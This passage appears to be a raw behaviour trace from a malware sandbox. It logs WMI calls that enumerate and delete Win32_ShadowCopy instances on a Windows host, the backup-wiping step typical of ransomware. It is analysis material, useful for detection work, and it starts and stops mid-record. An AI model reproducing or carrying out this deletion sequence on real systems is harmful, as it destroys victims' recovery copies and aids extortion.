0x0 [0123.003] WbemDefPath:IWbemPath:GetText (in: This=0x1c902e90, lFlags=4, puBuffLength=0x1c64cfa0*=0x54, pszText="00000000000000000000000000000000000000000000000000000000000000000000000000000000000" | out: puBuffLength=0x1c64cfa0*=0x54, pszText="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy.ID=\"{7199C78C-6563-4398-B813-4A3F86995AEC}\"") returned 0x0 [0123.003] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c8e1390, puCount=0x1c64cef0 | out: puCount=0x1c64cef0*=0x2) returned 0x0 [0123.003] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64cef0*=0x0, pszText=0x0 | out: puBuffLength=0x1c64cef0*=0x17, pszText=0x0) returned 0x0 [0123.003] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64cef0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c64cef0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0123.003] CoGetContextToken (in: pToken=0x1c64cd80 | out: pToken=0x1c64cd80) returned 0x0 [0123.004] WbemLocator:IUnknown:AddRef (This=0x1b797ce0) returned 0x3 [0123.004] WbemLocator:IUnknown:QueryInterface (in: This=0x1b797ce0, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64c950 | out: ppvObject=0x1c64c950*=0x1b797ce0) returned 0x0 [0123.004] WbemLocator:IUnknown:Release (This=0x1b797ce0) returned 0x3 [0123.004] WbemLocator:IUnknown:Release (This=0x1b797ce0) returned 0x2 [0123.004] IWbemClassObject:Get (in: This=0x1c907010, wszName="__GENUS", lFlags=0, pVal=0x1c64cee0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64cedc*=0, plFlavor=0x1c64ced8*=0 | out: pVal=0x1c64cee0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x1c64cedc*=3, plFlavor=0x1c64ced8*=64) returned 0x0 [0123.004] WbemDefPath:IWbemPath:GetText (in: This=0x1c902e90, lFlags=2, puBuffLength=0x1c64cfb0*=0x0, pszText=0x0 | out: puBuffLength=0x1c64cfb0*=0x3d, pszText=0x0) returned 0x0 [0123.004] WbemDefPath:IWbemPath:GetText (in: This=0x1c902e90, lFlags=2, puBuffLength=0x1c64cfb0*=0x3d, pszText="000000000000000000000000000000000000000000000000000000000000" | out: puBuffLength=0x1c64cfb0*=0x3d, pszText="Win32_ShadowCopy.ID=\"{7199C78C-6563-4398-B813-4A3F86995AEC}\"") returned 0x0 [0123.004] IWbemServices:DeleteInstance (in: This=0x1c8f44f8, strObjectPath="Win32_ShadowCopy.ID=\"{7199C78C-6563-4398-B813-4A3F86995AEC}\"", lFlags=0, pCtx=0x0, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0124.096] CoTaskMemAlloc (cb=0x8) returned 0x1b77f8d0 [0124.097] IEnumWbemClassObject:Next (in: This=0x1c8f4788, lTimeout=-1, uCount=0x1, apObjects=0x1b77f8d0, puReturned=0x1c64d8b8 | out: apObjects=0x1b77f8d0*=0x1c9076c0, puReturned=0x1c64d8b8*=0x1) returned 0x0 [0124.099] IUnknown:QueryInterface (in: This=0x1c9076c0, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64cbe0 | out: ppvObject=0x1c64cbe0*=0x1c9076c0) returned 0x0 [0124.100] IUnknown:QueryInterface (in: This=0x1c9076c0, riid=0x7fef2a9d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c64cc60 | out: ppvObject=0x1c64cc60*=0x0) returned 0x80004002 [0124.100] IUnknown:QueryInterface (in: This=0x1c9076c0, riid=0x7fef2a9d2c0*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c64c9f8 | out: ppvObject=0x1c64c9f8*=0x0) returned 0x80004002 [0124.101] IUnknown:AddRef (This=0x1c9076c0) returned 0x3 [0124.101] CoGetContextToken (in: pToken=0x1c64c8b0 | out: pToken=0x1c64c8b0) returned 0x0 [0124.102] IUnknown:QueryInterface (in: This=0x1c9076c0, riid=0x7fef2a9d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64c870 | out: ppvObject=0x1c64c870*=0x1c9076c8) returned 0x0 [0124.102] IMarshal:GetUnmarshalClass (in: This=0x1c9076c8, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c64c8a0 | out: pCid=0x1c64c8a0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0124.102] IUnknown:Release (This=0x1c9076c8) returned 0x3 [0124.103] CoGetContextToken (in: pToken=0x1c64c880 | out: pToken=0x1c64c880) returned 0x0 [0124.103] IUnknown:AddRef (This=0x1c9076c0) returned 0x4 [0124.103] IUnknown:QueryInterface (in: This=0x1c9076c0, riid=0x7fef2a9d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64c998 | out: ppvObject=0x1c64c998*=0x0) returned 0x80004002 [0124.103] IUnknown:Release (This=0x1c9076c0) returned 0x3 [0124.103] IUnknown:Release (This=0x1c9076c0) returned 0x2 [0124.103] CoGetContextToken (in: pToken=0x1c64cd40 | out: pToken=0x1c64cd40) returned 0x0 [0124.103] CoGetContextToken (in: pToken=0x1c64cc80 | out: pToken=0x1c64cc80) returned 0x0 [0124.103] IUnknown:AddRef (This=0x1c9076c0) returned 0x3 [0124.104] IUnknown:QueryInterface (in: This=0x1c9076c0, riid=0x1c64cdc0*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x1c64cda0 | out: ppvObject=0x1c64cda0*=0x1c9076c0) returned 0x0 [0124.104] IUnknown:Release (This=0x1c9076c0) returned 0x3 [0124.104] IUnknown:Release (This=0x1c9076c0) returned 0x2 [0124.104] IUnknown:Release (This=0x1c9076c0) returned 0x1 [0124.104] CoTaskMemFree (pv=0x1b77f8d0) [0124.104] CoGetContextToken (in: pToken=0x1c64d6c0 | out: pToken=0x1c64d6c0) returned 0x0 [0124.104] IUnknown:AddRef (This=0x1c9076c0) returned 0x2 [0124.105] IWbemClassObject:Get (in: This=0x1c9076c0, wszName="__GENUS", lFlags=0, pVal=0x1c64d830*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64d82c*=0, plFlavor=0x1c64d828*=0 | out: pVal=0x1c64d830*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x1c64d82c*=3, plFlavor=0x1c64d828*=64) returned 0x0 [0124.105] IWbemClassObject:Get (in: This=0x1c9076c0, wszName="__PATH", lFlags=0, pVal=0x1c64d7d0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64d7cc*=0, plFlavor=0x1c64d7c8*=0 | out: pVal=0x1c64d7d0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy.ID=\"{0F63D180-8A8A-41CF-8B3E-2852647AB192}\"", varVal2=0x0), pType=0x1c64d7cc*=8, plFlavor=0x1c64d7c8*=64) returned 0x0 [0124.105] SysStringLen (param_1="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy.ID=\"{0F63D180-8A8A-41CF-8B3E-2852647AB192}\"") returned 0x53 [0124.105] CoGetObjectContext (in: riid=0x1c64d768*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c64d760 | out: ppv=0x1c64d760*=0x212498) returned 0x0 [0124.106] IComThreadingInfo:GetCurrentApartmentType (in: This=0x212498, pAptType=0x1c64d780 | out: pAptType=0x1c64d780*=1) returned 0x0 [0124.106] IUnknown:QueryInterface (in: This=0x212498, riid=0x359dd40*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x1c64d888 | out: ppvObject=0x1c64d888*=0x0) returned 0x80004002 [0124.106] IUnknown:Release (This=0x212498) returned 0x1 [0124.108] CoGetClassObject (in: rclsid=0x1b7738e8*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef2a9d250*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c64cdf0 | out: ppv=0x1c64cdf0*=0x1c902160) returned 0x0 [0124.108] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c902160, riid=0x7fef2a9d2d0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c64cb00 | out: ppvObject=0x1c64cb00*=0x0) returned 0x80004002 [0124.109] WbemDefPath:IClassFactory:CreateInstance (in: This=0x1c902160, pUnkOuter=0x0, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64cae8 | out: ppvObject=0x1c64cae8*=0x1c902f50) returned 0x0 [0124.109] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c902f50, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64c9f0 | out: ppvObject=0x1c64c9f0*=0x1c902f50) returned 0x0 [0124.109] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c902f50, riid=0x7fef2a9d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c64ca70 | out: ppvObject=0x1c64ca70*=0x0) returned 0x80004002 [0124.109] WbemDefPath:IUnknown:AddRef (This=0x1c902f50) returned 0x3 [0124.109] CoGetContextToken (in: pToken=0x1c64c6c0 | out: pToken=0x1c64c6c0) returned 0x0 [0124.109] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c902f50, riid=0x7fef2a9d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64c680 | out: ppvObject=0x1c64c680*=0x1b793070) returned 0x0 [0124.110] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x1b793070, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c64c6b0 | out: pCid=0x1c64c6b0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0124.110] WbemDefPath:IUnknown:Release (This=0x1b793070) returned 0x3 [0124.110] CoGetContextToken (in: pToken=0x1c64c690 | out: pToken=0x1c64c690) returned 0x0 [0124.110] WbemDefPath:IUnknown:AddRef (This=0x1c902f50) returned 0x4 [0124.110] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c902f50, riid=0x7fef2a9d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64c7a8 | out: ppvObject=0x1c64c7a8*=0x0) returned 0x80004002 [0124.110] WbemDefPath:IUnknown:Release (This=0x1c902f50) returned 0x3 [0124.110] WbemDefPath:IUnknown:Release (This=0x1c902f50) returned 0x2 [0124.110] WbemDefPath:IUnknown:Release (This=0x1c902160) returned 0x0 [0124.110] WbemDefPath:IUnknown:Release (This=0x1c902f50) returned 0x1 [0124.111] CoGetContextToken (in: pToken=0x1c64d3c0 | out: pToken=0x1c64d3c0) returned 0x0 [0124.111] CoGetContextToken (in: pToken=0x1c64d300 | out: pToken=0x1c64d300) returned 0x0 [0124.111] WbemDefPath:IUnknown:AddRef (This=0x1c902f50) returned 0x2 [0124.111] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c902f50, riid=0x1c64d440*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c64d420 | out: ppvObject=0x1c64d420*=0x1c902f50) returned 0x0 [0124.111] WbemDefPath:IUnknown:Release (This=0x1c902f50) returned 0x2 [0124.111] WbemDefPath:IUnknown:Release (This=0x1c902f50) returned 0x1 [0124.111] CoGetContextToken (in: pToken=0x1c64d540 | out: pToken=0x1c64d540) returned 0x0 [0124.111] CoGetContextToken (in: pToken=0x1c64d480 | out: pToken=0x1c64d480) returned 0x0 [0124.111] WbemDefPath:IUnknown:AddRef (This=0x1c902f50) returned 0x2 [0124.111] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c902f50, riid=0x1c64d5c0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c64d5a0 | out: ppvObject=0x1c64d5a0*=0x1c902f50) returned 0x0 [0124.111] WbemDefPath:IUnknown:Release (This=0x1c902f50) returned 0x2 [0124.112] WbemDefPath:IUnknown:AddRef (This=0x1c902f50) returned 0x3 [0124.112] WbemDefPath:IWbemPath:SetText (This=0x1c902f50, uMode=0x4, pszPath="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy.ID=\"{0F63D180-8A8A-41CF-8B3E-2852647AB192}\"") returned 0x0 [0124.112] WbemDefPath:IUnknown:Release (This=0x1c902f50) returned 0x2 [0124.112] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c8e1390, puCount=0x1c64d800 | out: puCount=0x1c64d800*=0x2) returned 0x0 [0124.112] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64d800*=0x0, pszText=0x0 | out: puBuffLength=0x1c64d800*=0x17, pszText=0x0) returned 0x0 [0124.112] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64d800*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c64d800*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0124.113] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c8e1390, puCount=0x1c64d2a0 | out: puCount=0x1c64d2a0*=0x2) returned 0x0 [0124.113] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64d2a0*=0x0, pszText=0x0 | out: puBuffLength=0x1c64d2a0*=0x17, pszText=0x0) returned 0x0 [0124.113] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64d2a0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c64d2a0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0124.113] IWbemClassObject:Get (in: This=0x1c9076c0, wszName="__NAMESPACE", lFlags=0, pVal=0x1c64d290*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64d28c*=0, plFlavor=0x1c64d288*=0 | out: pVal=0x1c64d290*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="root\\cimv2", varVal2=0x0), pType=0x1c64d28c*=8, plFlavor=0x1c64d288*=64) returned 0x0 [0124.113] SysStringLen (param_1="root\\cimv2") returned 0xa [0124.114] IWbemClassObject:Get (in: This=0x1c9076c0, wszName="__NAMESPACE", lFlags=0, pVal=0x1c64d2a0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64d29c*=8, plFlavor=0x1c64d298*=64 | out: pVal=0x1c64d2a0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="root\\cimv2", varVal2=0x0), pType=0x1c64d29c*=8, plFlavor=0x1c64d298*=64) returned 0x0 [0124.114] SysStringLen (param_1="root\\cimv2") returned 0xa [0124.114] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c8e1390, puCount=0x1c64d2a0 | out: puCount=0x1c64d2a0*=0x2) returned 0x0 [0124.114] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64d2a0*=0x0, pszText=0x0 | out: puBuffLength=0x1c64d2a0*=0x17, pszText=0x0) returned 0x0 [0124.114] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64d2a0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c64d2a0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0124.114] IWbemClassObject:Get (in: This=0x1c9076c0, wszName="__CLASS", lFlags=0, pVal=0x1c64d290*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64d28c*=0, plFlavor=0x1c64d288*=0 | out: pVal=0x1c64d290*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ShadowCopy", varVal2=0x0), pType=0x1c64d28c*=8, plFlavor=0x1c64d288*=64) returned 0x0 [0124.114] SysStringLen (param_1="Win32_ShadowCopy") returned 0x10 [0124.114] IWbemClassObject:Get (in: This=0x1c9076c0, wszName="__CLASS", lFlags=0, pVal=0x1c64d2a0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64d29c*=8, plFlavor=0x1c64d298*=64 | out: pVal=0x1c64d2a0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ShadowCopy", varVal2=0x0), pType=0x1c64d29c*=8, plFlavor=0x1c64d298*=64) returned 0x0 [0124.114] SysStringLen (param_1="Win32_ShadowCopy") returned 0x10 [0124.119] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c902f50, puCount=0x1c64cfa0 | out: puCount=0x1c64cfa0*=0x2) returned 0x0 [0124.119] WbemDefPath:IWbemPath:GetText (in: This=0x1c902f50, lFlags=4, puBuffLength=0x1c64cfa0*=0x0, pszText=0x0 | out: puBuffLength=0x1c64cfa0*=0x54, pszText=0x0) returned 0x0 [0124.119] WbemDefPath:IWbemPath:GetText (in: This=0x1c902f50, lFlags=4, puBuffLength=0x1c64cfa0*=0x54, pszText="00000000000000000000000000000000000000000000000000000000000000000000000000000000000" | out: puBuffLength=0x1c64cfa0*=0x54, pszText="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy.ID=\"{0F63D180-8A8A-41CF-8B3E-2852647AB192}\"") returned 0x0 [0124.119] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c8e1390, puCount=0x1c64cef0 | out: puCount=0x1c64cef0*=0x2) returned 0x0 [0124.119] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64cef0*=0x0, pszText=0x0 | out: puBuffLength=0x1c64cef0*=0x17, pszText=0x0) returned 0x0 [0124.119] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64cef0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c64cef0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0124.119] CoGetContextToken (in: pToken=0x1c64cd80 | out: pToken=0x1c64cd80) returned 0x0 [0124.119] WbemLocator:IUnknown:AddRef (This=0x1b797ce0) returned 0x3 [0124.119] WbemLocator:IUnknown:QueryInterface (in: This=0x1b797ce0, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64c950 | out: ppvObject=0x1c64c950*=0x1b797ce0) returned 0x0 [0124.120] WbemLocator:IUnknown:Release (This=0x1b797ce0) returned 0x3 [0124.120] WbemLocator:IUnknown:Release (This=0x1b797ce0) returned 0x2 [0124.120] IWbemClassObject:Get (in: This=0x1c9076c0, wszName="__GENUS", lFlags=0, pVal=0x1c64cee0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64cedc*=0, plFlavor=0x1c64ced8*=0 | out: pVal=0x1c64cee0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x1c64cedc*=3, plFlavor=0x1c64ced8*=64) returned 0x0 [0124.120] WbemDefPath:IWbemPath:GetText (in: This=0x1c902f50, lFlags=2, puBuffLength=0x1c64cfb0*=0x0, pszText=0x0 | out: puBuffLength=0x1c64cfb0*=0x3d, pszText=0x0) returned 0x0 [0124.120] WbemDefPath:IWbemPath:GetText (in: This=0x1c902f50, lFlags=2, puBuffLength=0x1c64cfb0*=0x3d, pszText="000000000000000000000000000000000000000000000000000000000000" | out: puBuffLength=0x1c64cfb0*=0x3d, pszText="Win32_ShadowCopy.ID=\"{0F63D180-8A8A-41CF-8B3E-2852647AB192}\"") returned 0x0 [0124.120] IWbemServices:DeleteInstance (in: This=0x1c8f44f8, strObjectPath="Win32_ShadowCopy.ID=\"{0F63D180-8A8A-41CF-8B3E-2852647AB192}\"", lFlags=0, pCtx=0x0, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0124.959] CoTaskMemAlloc (cb=0x8) returned 0x1b77f8d0 [0124.959] IEnumWbemClassObject:Next (in: This=0x1c8f4788, lTimeout=-1, uCount=0x1, apObjects=0x1b77f8d0, puReturned=0x1c64d8b8 | out: apObjects=0x1b77f8d0*=0x1c907d70, puReturned=0x1c64d8b8*=0x1) returned 0x0 [0124.961] IUnknown:QueryInterface (in: This=0x1c907d70, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64cbe0 | out: ppvObject=0x1c64cbe0*=0x1c907d70) returned 0x0 [0124.961] IUnknown:QueryInterface (in: This=0x1c907d70, riid=0x7fef2a9d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c64cc60 | out: ppvObject=0x1c64cc60*=0x0) returned 0x80004002 [0124.961] IUnknown:QueryInterface (in: This=0x1c907d70, riid=0x7fef2a9d2c0*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c64c9f8 | out: ppvObject=0x1c64c9f8*=0x0) returned 0x80004002 [0124.961] IUnknown:AddRef (This=0x1c907d70) returned 0x3 [0124.961] CoGetContextToken (in: pToken=0x1c64c8b0 | out: pToken=0x1c64c8b0) returned 0x0 [0124.962] IUnknown:QueryInterface (in: This=0x1c907d70, riid=0x7fef2a9d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64c870 | out: ppvObject=0x1c64c870*=0x1c907d78) returned 0x0 [0124.962] IMarshal:GetUnmarshalClass (in: This=0x1c907d78, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c64c8a0 | out: pCid=0x1c64c8a0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0124.962] IUnknown:Release (This=0x1c907d78) returned 0x3 [0124.962] CoGetContextToken (in: pToken=0x1c64c880 | out: pToken=0x1c64c880) returned 0x0 [0124.962] IUnknown:AddRef (This=0x1c907d70) returned 0x4 [0124.962] IUnknown:QueryInterface (in: This=0x1c907d70, riid=0x7fef2a9d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64c998 | out: ppvObject=0x1c64c998*=0x0) returned 0x80004002 [0124.962] IUnknown:Release (This=0x1c907d70) returned 0x3 [0124.962] IUnknown:Release (This=0x1c907d70) returned 0x2 [0124.962] CoGetContextToken (in: pToken=0x1c64cd40 | out: pToken=0x1c64cd40) returned 0x0 [0124.962] CoGetContextToken (in: pToken=0x1c64cc80 | out: pToken=0x1c64cc80) returned 0x0 [0124.963] IUnknown:AddRef (This=0x1c907d70) returned 0x3 [0124.963] IUnknown:QueryInterface (in: This=0x1c907d70, riid=0x1c64cdc0*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x1c64cda0 | out: ppvObject=0x1c64cda0*=0x1c907d70) returned 0x0 [0124.963] IUnknown:Release (This=0x1c907d70) returned 0x3 [0124.963] IUnknown:Release (This=0x1c907d70) returned 0x2 [0124.963] IUnknown:Release (This=0x1c907d70) returned 0x1 [0124.963] CoTaskMemFree (pv=0x1b77f8d0) [0124.963] CoGetContextToken (in: pToken=0x1c64d6c0 | out: pToken=0x1c64d6c0) returned 0x0 [0124.963] IUnknown:AddRef (This=0x1c907d70) returned 0x2 [0124.963] IWbemClassObject:Get (in: This=0x1c907d70, wszName="__GENUS", lFlags=0, pVal=0x1c64d830*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64d82c*=0, plFlavor=0x1c64d828*=0 | out: pVal=0x1c64d830*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x1c64d82c*=3, plFlavor=0x1c64d828*=64) returned 0x0 [0124.963] IWbemClassObject:Get (in: This=0x1c907d70, wszName="__PATH", lFlags=0, pVal=0x1c64d7d0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64d7cc*=0, 